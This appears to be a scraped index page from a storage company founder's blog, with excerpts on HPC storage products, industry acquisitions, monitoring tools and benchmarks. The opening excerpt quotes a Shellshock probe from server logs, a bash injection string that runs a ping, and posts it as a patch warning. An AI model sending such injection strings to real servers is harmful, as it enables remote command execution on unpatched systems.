Request: '() {:;}; /bin/ping -c 1 104.131.0.69' This bad boy came from the University of Oklahoma, IP address 157.142.200.11 . The ping address 104.131.0.69 is something called shodan.io. Patch this one folks. Remote execution badness, and all that goes along with it.
Posts
Interesting bits around EMC
In the last few days, issues around EMC have become publicly known. EMC is the worlds largest and most profitable storage company, and has a federated group of businesses that are complementary to it. The CEO, Joe Tucci, is stepping down next year, and there is a succession “process” going on. Couple this to a fundamental shift in storage, from arrays to distributed tightly coupled server storage, such as Unison, which is problematic for their core business.
Posts
sios-metrics code now on github
See link for more details. It allows us to gather many metrics, saves them nicely in the database. This enables very rapid and simple data collection, even for complex data needs.
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000 Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. Its way to freaking simple.
Posts
New monitoring tool, and a very subtle bug
I’ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today. The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector.
Posts
New 8TB and 10TB drives from HGST, fit nicely into Unison
The TL;DR version: Imagine 60x 8TB drives (480TB about 1/2 PB) in a 4U unit or 4.8PB in a rack. Now make those 10TB drives. 600TB in 4U. 6PB in a full rack. These are shingled drives, great for “cold” storage, object storage, etc. One of the many functions that Unison is used for. These aren’t really for standard POSIX file systems, as your read-modify-write length is of the order of a GB or so, on a per drive basis.
Posts
The Haswells are (officially) out
Great article summarizing information about them here. Of course, everyone and their brother put out press releases indicating that they would be supporting them. Rather than add to that cacophony (ok, just a little: All Scalable Informatics platforms are available with Haswell architecture, more details including benchies … soon …) we figured we’d let it die down, as the meaningful information will come from real user cases. Haswell is interesting for a number of reasons, not the least of which is 16 DPi/cycle, but fundamentally, its a more efficient/faster chip in many regards.
Posts
Be sure to vote for your favorites in the HPCWire readers choice awards
Scalable Informatics is nominated in
#12 for Best HPC storage product or technology, #20 Top supercomputing achievement which could be for this, this on a single storage box, or this this result , #21 Top 5 new products or technologies to watch for our Unison and #22 for Top 5 vendors to watch Our friends at Lucera are nominated for #4, Best use of HPC in financial services Please do vote for us and our friends at Lucera!
Posts
InfluxDB cli is up on github
I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and … well … Link is here. And yes, the readme is borked about 1/2 way through. Doesn’t quite show the formatting of the output quite right. Will try to fix over the weekend, as I move this a far more feature complete bit.
Posts
Time series databases for metrics part 2
So I’ve been working with influxdb for a while now, and have a working/credible cli for it. I’ll have to put it up on github soon. I am using it mostly as a graphite replacement, as its a compiled app versus a python code, and python isn’t terribly fast for this sort of work. We want to save lots of data, and do so with 1 second resolution. Imagine I want to save a 64 bit measurement, and I am gathering say 100 per second.
Posts
Have a nice cli for InfluxDB
I tried the nodejs version and … well … it was horrible. Basic things didn’t work. Made life very annoying. So, being a good engineering type, I wrote my own. It will be up on our site soon. Here’s an example
./influxdb-cli.pl --host 192.168.5.117 --user test --pass test --db metrics metrics> \list series
.----------------------------------. | series name | +----------------------------------+ | lightning.cpuload.avg1 | | lightning.cputotals.idle | | lightning.cputotals.irq | | lightning.
Posts
Scalable Informatics 12 year anniversary
I had forgotten to mention, but we hit our 12 year mark on the 1st of August. We’ve grown from a small “garage” based company (really “basement-based” in Michigan, as garages aren’t heated in winter, nor cooled in summer here), with one guy doing consulting, cluster system builds, tuning, benchmarking, white paper writing … to a 10 person outfit building the worlds fastest and densest tightly coupled storage and computing systems.
Posts
Time series databases and system metrics
I am working on updating our FastPath appliance web management/monitoring gui for the day job. Trying to push data into databases for later analysis. Many tools have been written on the collection side, statsd, fluentd, … and some are actually pretty cool. The concern for me is the way these tools express their analytical and storage opinions, which is done on the storage side. The data collection side isn’t an issue, if anything, its a breath of fresh air relative to what else I’ve seen.
Posts
The best thing one can do with the tuned system is
yum remove tuned tuned-utils This isn’t quite as bad as THP, but its close.
Posts
Soon ... 12g goodness in new chassis
This is one of our engineering prototypes that we had to clear space for. A couple of new features I’ll talk about soon, but you should know that these are 12g SAS machines (will do 6g SATA of course as well).
Front of unit:
[ ](/images/IMG_2330.JPG)
Note the new logo/hand bar. The rails are also brand new, and are set to enable easy slide in/out even with 100+ lbs of disk in them.
Posts
But ... GaAs is the material of the future ... and always will be ...
I read a note on IBM’s recent allocation of capital towards research projects. It had this tidbit in there:
Well, there are a range of III-V materials. Not just GaAs. One of the big issues is the lattice mis-match between SI and many of the III-V material. This strain introduces “artifacts” in the bandstructure, not to mention structural morphologies. This said, those artifacts may be what the engineers want. Aluminum Phosphate and Gallium Phosphate are pretty well matched to SI.
Posts
Too simple to be wrong
I’ve been exercising my mad-programming skillz for a while on a variety of things. I got it in my head to port the benchmarks posted on julialang.org to perl a while ago, so I’ve been working on this in the background for a few weeks. I also plan, at some point, to rewrite them in q/kdb+, as I’ve been really wanting to spend more time with it. The benchmarks aren’t hard to rewrite.
Posts
OS and distro as a detail of a VM/container
An interesting debate came about on Beowulf list. Basically, someone asked if they could use Gentoo as a distro for building a cluster, after seeing a post from someone whom did something similar. The answer of course is “yes”, with the more detailed answer being that you use what you need to build the cluster and provide the cycles that you or your users will consume. Hey, look, if someone really, truly wants to run their DOS application, Tiburon/Scalable OS will boot it.
Posts
Scratching my head over a weird bonding issue
Trying to set up a channel bond into a 10GbE LAG. Set up bonding module, use the ‘miimon=200 mode=802.3ad’ options. The switch was sending LACP packets, 1/sec to the NICs. The NICs bond formed. But it didn’t seem to negotiate the LACP circuit correctly with the switch. The switch never registered it. I’ve not seen that one before. With Mellanox, Arista, Cisco, others like that, the LACP circuit forms correctly and quickly.
Posts
New customers
We have a number of nice new customers that have been absorbing about all of my time for the last few weeks. This is goodness. One has our current generation FastPath Cadence SSD converged computing and storage system, and will be running kdb+ on it. Another has a 1PB Unison parallel file system, and while we did the previous 2TB write in 73 seconds with it, we did some tuning and tweaking and are down to 68 seconds.
Posts
M&A: PLX snarfed by ... Avago ?
Ok, didn’t see this acquirer coming, but PLX being bought … yeah, this makes sense. Avago looks like they are trying to become the glue between systems, whether the glue is a data storage fabric, or communications fabric, etc. PLX makes PCIe switches and other kit. PCIe switch and interconnection is the direction that many are converging to. Best end to end latencies, best per-lane performance, no protocol stack silliness to deal with.
Posts
M&A: SanDisk snarfs FusionIO for $1.1B USD
This is only the beginning folks … only the beginning. See this. FusionIO was, quite arguably, in trouble. They needed a buyer to take them to the next level, and to avoid being made completely irrelevant. SanDisk is a natural partner for them. They have the fab and chips, FusionIO has a product. SanDisk has a vision for a flash-only data center. What’s interesting about this is that Fusion was sort of the last independent enterprise class PCI Flash vendors.
Posts
Selling inventory to clear space
[Update 16-June] We’ve sold the 64 bay FastPath Cadence (siFlash based) , and now we have a few more 60 bay hybrid Ceph and FhGFS units, as well as a 48 bay front mount siFlash. Whats coming in are many of our next gen 60 bay units, with a new backplane design, and we want to start running benchmarks with them ASAP. As we have limited space in our facility, we gotta make hard choices … Email me (landman@scalableinformatics.
Posts
Divestment: Violin sells off PCIe flash card
This article notes that Violin has divested itself of its PCIe flash card. This card was, to a degree, a shot across the Fusion IO/Virident/Micron bows. I don’t think it ever was a significant threat to them though. Terms of the sale indicate about $23M cash and assumptions of $0.5M liabilities, as well as hiring the team. What is interesting is where it was sold. Hynix. Yes, the memory chip/flash maker.
Posts
M&A: Seagate acquires LSI's flash and accelerated bits from Avago
I’ve been saying for a while that M&A; is going to get more intense as companies gird for the battles ahead. I see component vendors looking at doing vertical integration … not necessarily to compete with their customers, but to offer them alternatives, reference designs, etc. and capture a portion of the higher margin businesses. This move gives Seagate control over Sandforce controllers, and PCIe flash. See this link for more info.
Posts
Massive, unapologetic, firepower: 2TB write in 73 seconds
A 1.2PB single mount point Scalable Informatics Unison system, running an MPI job (io-bm) that just dumps data as fast as the little Infiniband FDR network will allow. Our test case. Write 2TB (2x overall system memory) to disk, across 48 procs. No SSDs in the primary storage. This is just spinning rust, in a single rack. This is performance pr0n, though safe for work.
usn-01:/mnt/fhgfs/test # df -H /mnt/fhgfs/ Filesystem Size Used Avail Use% Mounted on fhgfs_nodev 1.
Posts
Insanity in vendor distros
I am not sure if this is specific to SuSE (customer requirement, don’t ask), but there is some extreme … and I really, positively mean, EXTREME … boneheaded insanity in the dhcp stack in the initrd construction in SuSE. Something that doesn’t lend itself well, to, I dunno … CORRECT AUTOCONFIGURATION OF NETWORK PORTS IN DISKLESS ENVIRONMENTS. Ok, what clued me in was this snippet from the console I’ve been struggling with for the past day.
Posts
io-bm released
At long last, and yes, I can’t believe I let this slip for years … Its available here at our git site
Posts
Our new look and feel
Day job website has been updated to something … modern. Hopefully nothing is broken … I think it looks great; the Dougs did a terrific job. Seriously, I wound up breaking DNS at the day job (by accident … really) yesterday, in order to try to rationalize something. Had to roll back our DNS servers to an older code drop. That and I had to spin up a new dedicated mail/dns internal server.
Posts
Building efficient storage and computing platforms has little to do with using cheap hardware
This has been bugging me for a long time, and we have to address this in every discussion we have. You can’t build cost effective scale out systems on cheap-ass hardware designs. Its woefully inefficient, the cost blows up to achieve the type of performance we can achieve often with an order of magnitude fewer systems (hey … thats less acquisition cost, less TCO, less power/cooling, lower management strain, smaller footprint, tastes great, less filling, …) The only way people recognize this is when they actually try it themselves.
Posts
M&A: Inktank acquired by Red Hat
I am happy for Sage and team, this is a good exit. Obviously we didn’t know this was happening, but I guessed something like this a few weeks ago. Bigger picture: Open source technologies have been capturing mindshare from closed source object, file, and block for a while. This will serve to massively amplify this. GlusterFS was niche until Red Hat bought it. Then it went mainstream. Ceph isn’t GlusterFS though.
Posts
When ideology trumps pragmatic design
Real differentiation, adding real value to something, is often hard to do. Fundamental changes often take time, and are often incremental in scope, so they don’t break everything. That is, unless you are so completely convinced that your way is better, that you try to force the market in that direction. Sometimes these gambits work. Sometimes they don’t. This is about one that did not work. I am convinced my Mac OSX laptop may be the best laptop I’ve used.
Posts
busy last two weeks, and lots of traveling next two weeks
We’ve been cranking out the products to ship to customers, and I’ve been fretting over tests, as usual. And I finished my initial pass at the automated installer. It builds our new Debian based systems very nicely, though there is still a little human interaction. Working on it. And it should work perfectly for all Ubuntu as well. Have an install in Hollywood this week. New market for us, very interesting and it plays completely to our strengths.
Posts
when the networking revolution comes, the cheap switches will be the first ones against the wall
Seriously … no more cheap switches as the central point of information flow in storage or computing clusters. The money you save will be blown in the first hour you pay for down time or architectural changes you need to actually move your data without tossing packets on the ground … … because while standard network codes don’t care so much if they need to retransmit or lose data, cluster file systems get very … very … testy when data doesn’t arrive when and where it is supposed to, in the right order, because the cheap-ass switch was too busy tossing packets on the floor.
Posts
Slides from HPC on Wall Street Spring 2014 are up
See here. Very good conference, lots of good discussion.
Posts
hate to be an alarmist, but Heartbleed is worse than I had thought it was
TL;DR: Run, as in now, before you finish reading this, to update vulnerable OpenSSL packages. Restart your OpenSSL using services (ssh, https, openvpn). Then nuke your keys, and start all over again. Yeah, its that bad. I had hoped, incorrectly, that no one would start asking, “hey, can we exploit this in the wild?” any time soon. Unfortunately … exploits are live and out there. Have a look at this session hijacking done using the bug.
Posts
Sometime things work far better than one might expect
The day job builds a storage product which integrates Ceph as the storage networking layer. What happened was, in idiomatic American English: We made very tasty lemonade out of very bitter lemons. For the rest of the world, this means we had a bad situation during our setup at the booth. 3 boxes of drives and SSDs. 2 of them arrived. The 3rd may have been stolen, or gone missing, or wound up in a shallow grave somewhere.
Posts
Sometimes the right level of caffeination helps in work
I had an opportunity to review an old post I had written about playing with prime numbers. In it, I wrote out an explicit formula for a number, expressed as a product of primes. This goes to the definition of a composite or a prime number. Whats interesting is what leaps out at you when you look at something you wrote a while ago. Looking at the formula I wrote down, there is a very easy way to define if a number is prime or composite.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there whom will tell you that its pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
Negative latencies
I’ve been thinking for a while that our obsession with reduction of latency in computing and storage could be ameliorated by exploiting a negative latency design. A negative latency design would be one where a hypothetical message would arrive at a receiver before the sender completed sending it. There are a few issues with this. First off is how on earth, or elsewhere, is this possible? Second, aren’t there issues with causality violations?
Posts
HPC on Wall Street session on low latency cloud
See here for the program sheet. The session is here: HPC on Wall Street Flyer Description is this:
Wall Street and the global financial markets are building low latency infrastructures for pro- cessing and timely response to information content in massive data flows. These big data flows require architectural design patterns at a macro- and micro-level, and have implications for users of cloud systems. This panel will discuss, from macro to micro, how new capabilities and technologies are making a positive impact.
Posts
Intel ditches own Hadoop distro in favor of Cloudera
Last year, Intel started building its own distro of Hadoop. Their argument was that they were optimizing it for their architecture (as compared to, say, ARM). Today came word (via InsideHPC.com) that they are switching to Cloudera. This makes perfect sense to me. Intel couldn’t really optimize Hadoop by compiler options to use new instruction capability (part of their selling point), as Hadoop is a Java thing. And Java has its own VM, and many performance touch points that have nothing to do with processor architecture.
Posts
Nice interview with Freeman Dyson
Freeman Dyson is an incredible scientist. I imagine he, Terrance Tao, Paul Erdos and a number of others are all woven from the same cloth. Dyson has done some amazing work, and probably will do some more amazing work. The interview is here. One of the comments he made really struck me as being dead on correct …
I’ve used similar language, describing a Ph.D. as a union card. And I agree it takes far too long in physics.
Posts
Free market forces at work, the way they should be
There’s a much publicized (in SV) trial going on over an oligarchic wage suppression scheme that was in force between a number of big players in SV. Apart from Facebook that is. Techcrunch has the details. What transpires when free market forces are allowed to work with their invisible hands unconstrained? Simple.
Kudos to facebook for doing the right thing, though in all honesty, I don’t attribute this to being altruistic on their part.
Posts
Staring into voids that stare back
I had mentioned this in my write up about our 10 year anniversary.
And this post yesterday from Scott Weiss at Andreessen Horowitz
Its in that staring deep and hard into the yawning void that one gets their inspiration. Call it sheer abject terror, or motivation. Whatever. It juices your processors into overdrive if you are an entrepreneur. You are at your most creative when you are at your most fearful.
Posts
Good read on ageism in SV VCs
Oddly enough at the New Republic. Article is here. I was somewhat amused by the read, but some of it rung quite true. Its nice to hear of more of the signals one needs to read VC tea leaves. They never say no, but they do move goal posts, always outward, always away from you. The article implies they get hung up on TAM, as a proxy for what they really think.
Posts
Unicode and python 64 bit build
[Update] I gave up on 2.7.x. Nothing I did made it work. I removed all the options apart from prefix for compilation of 3.4.0. That worked. Now onto building ipython, ijulia and other good things (SciPy stack). We will use 3.x going forward rather than try to remain compatible with 2.x. Updating our tool chain to include a modern python which will be outside of the distro version. Long … long experience dealing with distro based tools are that they are usually … badly … out of date.
Posts
SIOS Inst
Ok, I am taking the leap. I’ve started working on the SIOS Inst system. Basically, after reviewing everything thats broken (and for that matter unfixable) in the anaconda, debian-installer, and other installation mechanisms, I’ve decided that for our purposes, the only way that we are going to get correct and reliable builds for stateful systems is to forgo these systems advanced installation mechanisms. If we can skip the code entirely, we will.
Posts
HPC on Wall Street
Not only do we have a booth, but we are sponsoring a session on Low Latency Cloud and Big Data. Roosevelt Hotel in NYC on 7-April. See the site for more details. If you’d like to attend and need a pass, please contact me at the day job. Our partners Lucera, Inktank, and Pluribus Networks will be there with us. Possible more.
Posts
Not so fast ...
Well, after nearly a decade of hooplah over a realization of a quantum computer, an interesting study found that it was
There are a few important elements of this … it uses 1/5th the number of qubits that the newer generation machine used. But it wasn’t, as earlier reported, thousands of times faster.
Way back in the day, when working on benchmarking big machines, and comparing performance, one of the major criteria was using identical (or as near to identical) algorithms as possible to assess machine speed, compiler quality, etc.
Posts
Which (computer) language to learn next?
Ok, I have as one of my professional goals, to learn a new computer language. I am at master level in several, proficient in others, and have working knowledge of a fair number. I’ve forgotten more than I care to admit about some (Fortran, Basic, C/C++, APL, x86 Assembler). The contenders for me should be useful languages. These are not things that should be learned for the sake of learning, but for real useful purposes.
Posts
OT: AirBnB and their issues
Ok, this one is sad. Saw this linked off of hacker news. I am not sure if this is satirical, humorous, or real. It doesn’t quite matter though. We’ve used AirBnB twice now. And we have a firm policy, as a direct result of those very negative experiences, of never … ever … using it again. To be fair, AirBnB is effectively a market maker dealing with the commodity of unused space which could be turned into a profitable asset.
Posts
Playing with several noSQL/document/tuple/time series DBs
We’ve been using MongoDB for a while for a number of things, internally, and thinking about using it for Tiburon as the restful interface. It has some nice aspects about it, but it also has some known issues for larger DBs. Considering what we want to do for some of our work, these larger DB issues are potentially problematic for us. Basically, MongoDB is one of the class of mmap’ed DBs.
Posts
Retired Apache as web server
This has been a long time coming for me. I’ve been using Apache in one form or another since the 90’s. I’ve never found it easy to configure, and often ran into maddening bugs in the config files and how they interacted with the server itself. I’d taken a long time to evaluate the various alternatives. Lighttpd caught my fancy for a while, but I ran into similar problems with config.
Posts
Couldn't have said it better myself ...
Robin at StorageMojo has an interesting article up (right after the one about Violin maybe being dead). I won’t comment on that second one, other than to say I disagree with his analysis and conclusions. As the day job is nominally a competitor (we’ve seen them in a deal, once) I am biased. But the fundamental analysis simply doesn’t look good for them (or Fusion, or …). They need a larger player to buy them.
Posts
The resurrection of autoinst ...
A long time ago, in a galaxy far, far away … I worked for this company named SGI. SGI machines and software were awesome … I had used them (R3k and R8k) for doing calculations for my thesis. Very very fast. But very hard to install/manage. In fact, brutally hard. This was not lost on customers with many of these devices. One of those customers read SGI the riot act on this.
Posts
Good read on the faux-STEM shortages
Good post over at Math Blog. There is no short of STEM folks in the US, and hasn’t been for a long … long time. Any shortage of STEM folks would be well represented by a number of economic factors: 1) rapidly rising compensation rates (economic scarcity impacts upon costs of labor), 2) very short job search times for STEM folks, 3) additional market based initiatives to find and retain STEM folks.
Posts
Reality vs what one might like
Many years ago, I had this thought in my head that I wanted to be a physics professor. No, really. I went through all the motions. Undergrad BS, then MS and then PhD. While I was doing this, the Soviet Union collapsed. How was that fact related to my former desire to be a physics prof? Simple. Its economics. Its always economics. Anyone tells you differently, they are either lying or selling you something.
Posts
Just created a new external dns on Digital Ocean
About 2 years ago, we had an issue with an internal server blowing up, taking data and config with it. I resolved to place some of our core infrastructure (external DNS, etc.) beyond our virtual boundaries, so we could maintain email/web presence in the event of a power or server issue. This has proven to be a prescient and wise move. We started out on Amazon with their small instances. And started out with dnsmasq, as I didn’t want to re-learn bind and all that config.
Posts
Our second(!) Unison FhGFS based unit
Burning in … Hammering on all disks, while computing pi, e, sqrt(2), … It is a thing of beauty …
[ ](/images/unison.png)
First one was an Isilon replacement. We seem to have many more of these in queue.
Posts
A must-read on HD selection
Henry could probably write far more in depth about this subject than he did. Regardless this is a must-read article. Now it is important to understand where you can use each technology, and Henry does a great job of explaining some of these. However, its important to note that as some of the file system and device bits are pushed into higher levels in the stack, some of the functionality becomes redundant at the lower levels.
Posts
Big blue blues?
I remember my two stints at IBM T.J. Watson very well … first as a summer student (college hire for summer), and then as an engineer after finishing undergraduate. It was a wonderful place. I really enjoyed it. Not simply computer nerd heaven, but physical scientist nerd heaven as well. IBM famously was the company that resisted layoffs and downsizing for a long time. But it eventually gave in, and was forced into RIF actions during their troubled times in the 1990’s and 2000’s.
Posts
In 18 months ...
… I’ll have hit 10 years of blogitude … bloggerisms … er … generation of large amounts of noise and heat, and hopefully at least a little light? Mebbe?
Posts
Excellent article on Lucera's financial cloud
… that the day job is building atop our siCloud platform. In the article (definitely read it!) there is an great discussion about what the fundamental differences are between what Lucera is aiming for and what more traditional commodity cloud vendors are focused upon. When it comes down to it, the difference is architecting for density of VMs in the commodity cloud versus architecting for performance and low latency in the performance cloud (Lucera’s).
Posts
Does fibre channel have a future?
Strange question. Its really a question about block storage in general than FC in particular, but I have a sense that FC may be the first to go down as it were. Ok … I’ve been looking up mechanisms to help customers in a media editing environment. Their preferred file system depends, to a degree, upon IP over FC for connectivity. They need to interconnect Mac OSX machines, Linux and Windows machines to the same storage resources.
Posts
The end of an era
Posted to the xfs list:
SGI is stepping out of maintainer roles for xfs, xfsprogs, xfsdump, and xfstests. This removes me from the MAINTAINERS entry. Signed-off-by: XXXXXXXXXXXXXX --- [SGI will continue to host oss.sgi.com as a repository for the XFS open source git trees, mailing list, and documentation as is provided today. And will also continue to participate in a less formal role.] Thanks! -Ben MAINTAINERS | 1 - 1 file changed, 1 deletion(-) SGI the original creator of xfs, almost 20 years ago, is removing itself from the pathway going forward.
Posts
Updates: been busy, but here are a few
We’ve sold our first Unison storage cloud to replace an Isilon unit for a bioinformatics core. Performance and density matter, and we have both. About to deploy next phase of cloud for one of our partners … Setting up an exciting trade show presence … Working on an extension of what we’ve been wanting to build for a long time … and now it looks like its in reach. Oh … my … this is huge …
Posts
The state of HPC tier 1 vendors
Much has been happening in the HPC tier 1 vendor space. Some of it has made the news, much has not. The TL;DR version: I believe that most of the tier 1 HPC capability may have been wiped out over the last few months. 1 tier 1 and a bunch of tier 2 are left. Basically, the HPC market has a number of tiers within it, and product mixes across these tiers.
Posts
Lyrical offspring
I can’t name her, at her request, but this is my progeny singing for her high school battle of the bands. They took second place.
Fantastic job, offspring of mine!
Posts
The changing face of storage
Over at InsideHPC, Rich pointed to an blog by Henry Newman about the changing face of SSD. I’d argue that its not just SSD, but storage in general. But Henry, as usual, nails it. Henry opines
To a degree, we see them at least investing in the technologies behind the up market devices. At “worst” acquiring them. Because as Henry points out
Very much so. Look at Seagate and WD with their micro NAS appliances.
Posts
On those annoying full page non-scrollable javascript ads on pages
Guys, please, seriously, stop that. They don’t work on mobile or desktop devices when the window size is smaller than the area required to see the [X] Close button. Whom ever came up with this, it is a bad idea. Stop it now. Before I get pissed off enough to write a web proxy that specifically filters out such stupidity, or purposefully renders that to an offscreen invisible layer which is forced to be non-modal.
Posts
An offer for the day job's customers in financial services
See here. TL;DR version: A free month on Lucera’s cloud.
Posts
OCP thoughts
I didn’t post a response to the article written a little more than a year ago claiming that OCP had “blown up the server market”. Yes, that was really in the title. I’ll ignore most of the obvious issues with this, but lets review a year later, shall we? Open hardware designs are great in concept. Share your design with the world, and lower your customers costs … er … whoops.
Posts
IBM's sale of x86 servers and networking to Lenovo
I’d waited a while before posting on this for a number of reasons, not the least of which was I was quite busy. But also, I wanted to understand what was and was not sold. Now that some of the dust has settled, and both companies have publicly discussed this, we know pretty well what is included in the sale. I don’t need to get in to that aspect, you can read it all very succinctly on Lenovo’s site.
Posts
The last straw for us for gluster
We’ve had customers migrating off of it for the past few years, as bugs have gone un-addressed, reports closed, and discussions cut off or ignored. Its costing us too much in support time and effort now. Its time to pull the plug. I like many things about gluster. Really I do. I’ve been a strong proponent of it long before it was cool to do so, as the design was in line with what I thought was needed to build scale out file systems.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Something has been bugging me about the CentOS absorption by Red Hat
I am obviously not a lawyer, and I’ve not consulted one. Feel free to point out my mistakes, and note that this is not legal advice. You need to speak to a lawyer on that, I am just guessing. The language on here is pretty clear as to what Red Hat owns. I have no problem with their ownership of it. Nor do I have a problem with them imposing their particular concept of ownership.
Posts
Yay, latest Java update broke Supermicro remote console
JRE 7 u 51. Self signed Java console applet. Let the hilarity begin. I tried uploading our own cert and key to the unit. No luck. Its the applet the needs to be re-signed. This is the joyous message that awaits:
Of course, the IPMIview tool sorta kinda works. Though its useless for remote support ops. Doesn’t set off the signed issue. Mebbe they ignore signing? Which is worse … the self signed cert, or the sign ignoring app.
Posts
An analytical takedown, gone awry
See here which is the response to the arvix article here. While the Facebook data scientists refer to their post as a debunking, using irrelevant metric (enrollment vs google rank? and the theory behind this is … what?), the paper points out something quite important. Social networking success has been largely ephermal, and not sustainable. Its a transient phenomenon. Anyone remember Friendster? MySpace? More to the point, the internet entities that dominated 15 years ago are largely gone.
Posts
When bugs attack ... the case of the ever expanding VirtualBox image
So I’ve got a Mac Mini and a Linux machine on my desk at work. I am trying hard to use the Mac Mini for day to day stuff, but the sheer broken-ness of the keyboard (yes, really) for Mac’s is driving me near batty. I am trying though. (Hint to Apple: You aren’t better at everything, and most especially not keyboards and interfacing to higher quality Logitech keyboards, you almost completely fail … don’t even get me started on mice …).
Posts
CentOS™ merges with Red Hat
See this page for more. Inclusive of this merging is a new set of requirements for using the word CentOS. Since we ship an updated and modified kernel, and we update and modify packages to reflect our needs, we are going to have to alter our “CentOS derived distribution” statement. Or switch to another distribution. Its an annoyance, but maybe its time to revisit the distribution scenario. I see nothing wrong with using Debian as the basis, and building from there.
Posts
Blocking hacker probes
I honestly no longer even write a nice note to their ISP. I just tend to block the whole ISP from reaching our site(s). Its easier, and lower pain for us. Definitely saddens me that we have to do this, but I see enough probes in our logs that I have to.
Posts
Fixed the IPoIB performance issue
For our Unison Parallel File Systems Appliance:
[root@unison-jr4-2 ~]# iperf -c 10.3.1.1 ------------------------------------------------------------ Client connecting to 10.3.1.1, TCP port 5001 TCP window size: 1.00 MByte (default) ------------------------------------------------------------ [ 3] local 10.3.1.2 port 48383 connected with 10.3.1.1 port 5001 [ ID] Interval Transfer Bandwidth [ 3] 0.0-10.0 sec 13.5 GBytes 11.6 Gbits/sec and of course in parallel
[root@unison-jr4-2 ~]# iperf -c 10.3.1.1 -P2 ------------------------------------------------------------ Client connecting to 10.3.1.1, TCP port 5001 TCP window size: 1.
Posts
A network we can work with ...
A Unison file system appliance connected with Infiniband and 10GbE.
[root@unison-jr4-2 ~]# qperf 10.3.1.1 rc_bi_bw rc_bi_bw: bw = 9.7 GB/sec [root@unison-jr4-2 ~]# qperf 10.3.1.1 ud_lat ud_bw ud_lat: latency = 3.66 us ud_bw: send_bw = 4.9 GB/sec recv_bw = 4.9 GB/sec and of course, IPoIB
[root@unison-jr4-2 ~]# qperf 10.3.1.1 tcp_bw tcp_lat tcp_bw: bw = 474 MB/sec tcp_lat: latency = 13.4 us which, if you run the same thing over a pair of good 10GbE ports …
Posts
M&A continues ... Xyratex bought by Seagate
The story is in the Register. An immediate question, and one of somewhat deja vu (all over again) … what is the impact upon Lustre IP? Xyratex had announced that it obtained ownership of the Lustre IP from Oracle a few months ago. This IP was in the form of trademarks, and a number of related bits. Now Xyratex has been bought. And if it keeps the Lustre HPC bits, it will be directly competing with its customers.
Posts
The evolving market for HPC: part 1, recent past
I’ve said this many times, and at many different venues. HPC drives downmarket, and does so very hard. High cost solutions have limited lifetimes, at best. At worst, they will not catch on. 2013 was the year of the accelerators. We predicted this many years ago. I won’t beat this dead horse (for us). I’ll simply say “we were right”, and right with great specificity and accuracy. This seams to be a pattern with us.
Posts
Prognostications for 2014 from an expert
Not me. Henry Newman at Enterprise Storage Forum. See articlehere. His first prediction of more consolidation in the SSD space is a given. I’ve been arguing that for a while. On the fab side, there are what … four producers left? Toshiba/Sandisk, Samsung, Intel/Micron, Hynix? Did I miss anyone? Will any of them leave (voluntarily or otherwise)? I think the SSD space that will really consolidate is on the SSD-as-a-rack-appliance side, as well as on the card side.
Posts
M&A: Avago grabs ... LSI ... ?
Avago, a spinout from Agilent which was a spinout from HP, just bought LSI. Avago is largely a supplier of components to a variety of industries, dealing with modules, optoelectronics, etc. If you look at their product mix, you see effectively zero overlap with LSI. They are not even in, arguably, the same markets. I am scratching my head over this one. I could see it as a play to gain a foothold into the storage space.
Posts
First new Unison product sold
We were showing off the Unison units at #SC13, and while on the show floor, we managed to sell a storage cluster. Well, technically, the sale occurred after the show (last week in reality), but most of the configuration back and forth was during the show. I can’t say anything about the configuration or stack on it … yet … but you’ll be hearing about it fairly soon. Its one we talk about quite a bit.
Posts
Violin's (and other pure flash array vendors) post IPO struggles continue
There’s a story on The Register right now about Violin Memory losing its CTO. But that’s not the real interesting story. In the article, Chris Mellor does a pretty good job of laying bare the issues around Violin.
There are several different threads running through this. First, they don’t have much real software IP. Their hardware IP is a different story, but fundamentally, we’ve found that its best to have a very simple and effective hardware design, coupled with intelligent software.
Posts
The most popular data analytics language
… appears to be R
[ ](http://revolution-computing.typepad.com/.a/6a010534b1db25970b019b00077267970b-popup)
This is in line with what I’ve heard, though I thought SAS was comparable in primary or secondary tool usage. This said, its important to note that in this survey, we don’t see mention of Python. Working against this is that it is a small (1300-ish) self-selecting sample, and the reporting company has a stake in the results. Also of importance is that R is a package with an embedded programming language, and Python is a programming language with add-ons.
Posts
And the SC13 video from InsideHPC is up
As usual Rich and the team at InsideHPC have done a tremendous job. If you don’t know InsideHPC and its sibling, InsideBigData, I highly recommend both publications. They are on my go-to list as information sources/summaries. The video shows a well caffinated Joe, talking through our new products. The problem for us was there simply wasn’t sufficient time to go into detail on everything. Which is a shame IMO, but one we’ll look at rectifying later.
Posts
The 60 second guide to big data by gogrid
The GoGrid folks have put together a nice marketing slide on big data, in the sense that they are explaining the features of it without explaining it, or how/where they fit. Its implied that they provide all you need for Big Data, but its their points along the way that make a great point for the day job and especially our new Fast Path Big Data Appliances. Our argument has always been that you can’t approach Big Data with last millennium’s architecture.
Posts
Big data languages: the reason for the tests
In a number of recent articles, I’ve seen/read that “Python is displacing R”, and other similar things. Something about this intrigued me, as I had heard many years ago that “Python was displacing Perl”. Only, it wasn’t. And others are questioning the supplantation premise quite strongly. It seems that there is little actual evidence of this. Mostly hyperbole, guesses, and dare I say, wishful thinking. It seems that this is modus operandi for Python advocates, and their latest object of attention is R.
Posts
Riemann zeta function in parallel/vector data languages
